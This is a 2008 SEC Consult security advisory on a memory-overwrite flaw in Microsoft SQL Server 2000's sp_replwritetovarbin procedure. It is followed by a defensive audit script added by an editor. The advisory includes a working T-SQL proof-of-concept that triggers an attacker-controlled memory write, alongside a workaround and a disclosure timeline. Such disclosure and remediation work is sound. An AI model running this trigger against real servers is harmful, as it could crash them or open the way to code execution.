SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000


Subject: SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000
        sp_replwritetovarbin limited memory overwrite vulnerability
From: Bernhard Mueller <research@sec-consult.com>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
        Bugtraq <bugtraq@securityfocus.com>
Date: Tue, 9 Dec 2008 13:16:34 +0100
Message-ID: <1228824994.7036.8.camel@b4byl0n>


SEC Consult Security Advisory < 20081209-0 >

title:              Microsoft SQL Server 2000 sp_replwritetovarbin limited memory overwrite vulnerability
program:            Microsoft SQL Server 2000
vulnerable version: <= 8.00.2039
homepage:           www.microsoft.com
found:              2008-04-12
by:                 Bernhard Mueller (SEC Consult Vulnerability Lab)
perm. link:         http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
Product description:
--------------------
Microsoft SQL Server is a relational database management system (RDBMS) produced by Microsoft. Its primary query language is Transact-SQL, an implementation of the ANSI/ISO standard Structured Query Language (SQL) used by both Microsoft and Sybase.

Vulnerability overview:
-----------------------
By calling the extended stored procedure sp_replwritetovarbin and supplying several uninitialized variables as parameters, it is possible to trigger a memory write to a controlled location. Depending on the underlying Windows version, it may be possible to use this vulnerability to execute arbitrary code in the context of the vulnerable SQL Server process. In a default configuration the sp_replwritetovarbin extended stored procedure can be executed by any login. The vulnerability can therefore be exploited by an authenticated user with a direct database connection, or through SQL injection in a vulnerable web application.

Vulnerability details:
----------------------
The following T-SQL script can be used to test for the vulnerability. It builds a batch that declares the output variables without initializing them, appends a 3000-character string of 'A' (0x41) as the following argument, and runs the batch through sp_executesql:

--------------------------------
DECLARE @buf NVARCHAR(4000), @val NVARCHAR(4), @counter INT

SET @buf = '
declare @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int, @buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1, @end_offset output, @vb_buffer output, @vb_bufferlen output,'''

SET @val = CHAR(0x41)
SET @counter = 0

WHILE @counter < 3000
BEGIN
    SET @counter = @counter + 1
    SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'', ''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------

This triggers an access violation exception (write to address 0x41414141, i.e. the attacker-supplied 'A' bytes become the write destination). The vulnerability has been successfully used to execute arbitrary code on a lab machine. SEC Consult will not release code execution exploits for this vulnerability to the public.

Workaround:
-----------
Remove the sp_replwritetovarbin extended stored procedure.
Run the following as an administrator in the master database:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also: "Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx

Patch:
------
According to an email received from Microsoft in September 2008, a fix for this vulnerability has been completed. The release schedule for this fix is currently unknown.

Vendor timeline:
----------------
Vendor notified:                                                  2008-04-17
Vendor response:                                                  2008-04-17
Last response from Microsoft:                                     2008-09-29
Request for update status 1:                                      2008-10-14
Request for update status 2:                                      2008-10-29
Request for update status 3:                                      2008-11-12
Request for update status 4 and prenotification of release date:  2008-11-28
Public release:                                                   2008-12-09

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008
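The build check and the workaround from the advisory, gathered into one T-SQL audit script. This is an added example written for this page; it is not part of the SEC Consult advisory or of Microsoft's guidance. It assumes a SQL Server 2000 instance and uses only catalog tables and system procedures that exist there (SERVERPROPERTY, master..sysobjects, sp_helpextendedproc, sp_helprotect, sp_dropextendedproc); the @apply_workaround switch and the replication caveat are the editor's additions, not the advisory's.

```sql
-- Added example (editor's, not from the SEC Consult advisory): audit a SQL Server 2000
-- instance for the sp_replwritetovarbin issue and optionally apply the advisory's
-- workaround. Run as a member of the sysadmin role.
USE master
GO

DECLARE @ver NVARCHAR(128), @build INT, @apply_workaround BIT
SET @apply_workaround = 0        -- dry run by default; set to 1 to drop the procedure

-- 1. Build check. The advisory lists builds <= 8.00.2039 as vulnerable.
--    SERVERPROPERTY('ProductVersion') returns e.g. '8.00.2039' on SQL Server 2000.
SET @ver = CONVERT(NVARCHAR(128), SERVERPROPERTY('ProductVersion'))
IF LEFT(@ver, 5) = '8.00.'
BEGIN
    SET @build = CONVERT(INT, SUBSTRING(@ver, 6, LEN(@ver) - 5))   -- '2039' from '8.00.2039'
    IF @build <= 2039
        PRINT 'Build ' + @ver + ': within the affected range (<= 8.00.2039)'
    ELSE
        PRINT 'Build ' + @ver + ': newer than the range listed in the advisory'
END
ELSE
    PRINT 'Build ' + @ver + ': not SQL Server 2000, outside the scope of this advisory'

-- 2. Exposure check. Extended stored procedures are rows in master..sysobjects with
--    xtype = 'X'. sp_helpextendedproc shows the DLL the procedure is bound to (keep
--    that output: it is what you need to re-register it with sp_addextendedproc).
--    sp_helprotect lists who holds EXECUTE; per the advisory, on a default install
--    any login can call it.
IF EXISTS (SELECT 1 FROM master.dbo.sysobjects
           WHERE name = 'sp_replwritetovarbin' AND xtype = 'X')
BEGIN
    PRINT 'sp_replwritetovarbin is registered on this instance'
    EXEC master.dbo.sp_helpextendedproc 'sp_replwritetovarbin'
    EXEC master.dbo.sp_helprotect 'sp_replwritetovarbin'

    -- 3. Workaround from the advisory: drop the extended procedure.
    --    Caveat (editor's assumption, not stated in the advisory): the sp_repl* prefix
    --    marks a replication helper, so confirm no publication on this server depends
    --    on it before dropping, and keep the sp_helpextendedproc output for a rollback.
    IF @apply_workaround = 1
    BEGIN
        EXEC master.dbo.sp_dropextendedproc 'sp_replwritetovarbin'
        PRINT 'sp_replwritetovarbin dropped'
    END
    ELSE
        PRINT 'Dry run: set @apply_workaround = 1 to drop sp_replwritetovarbin'
END
ELSE
    PRINT 'sp_replwritetovarbin is not registered; the workaround is already in place'
```

The script is deliberately a dry run until @apply_workaround is set, because sp_dropextendedproc takes effect immediately and server-wide; the sp_helpextendedproc output printed before the drop is the information needed to restore the procedure if removing it breaks something.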
